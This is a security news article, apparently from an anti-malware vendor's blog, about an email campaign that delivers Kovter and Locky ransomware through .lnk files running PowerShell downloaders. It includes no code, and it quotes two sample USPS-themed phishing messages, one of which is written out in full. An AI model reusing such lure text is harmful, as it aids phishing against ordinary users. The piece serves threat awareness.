Improved Scripts Deliver Kovter and Locky

Aggressive computer hackers are distributing a new email campaign that delivers both Kovter and Locky to their targets.

Kovter And Locky Delivered In A New Wave Of Malware Campaigns

SpyHunter anti-malware tool will diagnose all current threats on the computer. By purchasing the full version, you will be able to remove all malware threats instantly. Additional information about SpyHunter / Help to uninstall SpyHunter

Computer criminals are using a combination of a new generation of scripts to install both Kovter and Locky on their target hosts. Security experts discovered a few months ago an emerging email campaign that distributed .lnk files using a malicious script that infects with the Locky ransomware. When the malicious file is opened this executes an embedded PowerShell script which downloads the relevant threat from a download site. A more complex version of this has been discovered which delivers various malware from an extended list of sites.

The new script uses no less than five different domains to attempt to download the relevant malware. In addition to the Locky ransomware it also delivers Kovter. It also attempts to access a specific location in the domain by using a parameter value, all hardcoded domains are attempted until the payload is successfully installed. If the payload is unable to be downloaded another parameter value is initiated. The reason why multiple domains and this technique are used is to prevent various URL filtering options that may prohibit the infection.

Sample Kovter And Locky Email Bearing Messages

As usual the malicious scripts are delivered using email campaigns that use social engineering tricks. Here is an example message which spoofs the USPS delivery notification:

Dear Roberto,

This is to confirm that your item has been shipped at January 24.

Review the document that is attached to this e-mail!

Thank you for your assistance in this matter, Marion Wooodard, USPS Mail Delivery Clerk.

Another sample message reads the following:

Dear Norma,

We can not deliver your parcel arrived at January 20.

Please check the attachment for details!

Best regards,

Wayne Christensen,

USPS Mail Delivery Clerk.

The downloaded Kovter And Locky infections the relevant encryption engine is started and the target user data is encrypted using a strong cipher. Depending on the Locky strains a different extension may be used – Zepto, Odin, Thor, Aesir or Osiris.

For more information about this emerging threat you can read Microsoft’s detailed post.

SpyHunter anti-malware tool will diagnose all current threats on the computer. By purchasing the full version, you will be able to remove all malware threats instantly. Additional information about SpyHunter / Help to uninstall SpyHunter

Was this content helpful?

Avatar

Author : Martin Beltov

Martin graduated with a degree in Publishing from Sofia University. As a cyber security enthusiast he enjoys writing about the latest threats and mechanisms of intrusion.


Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *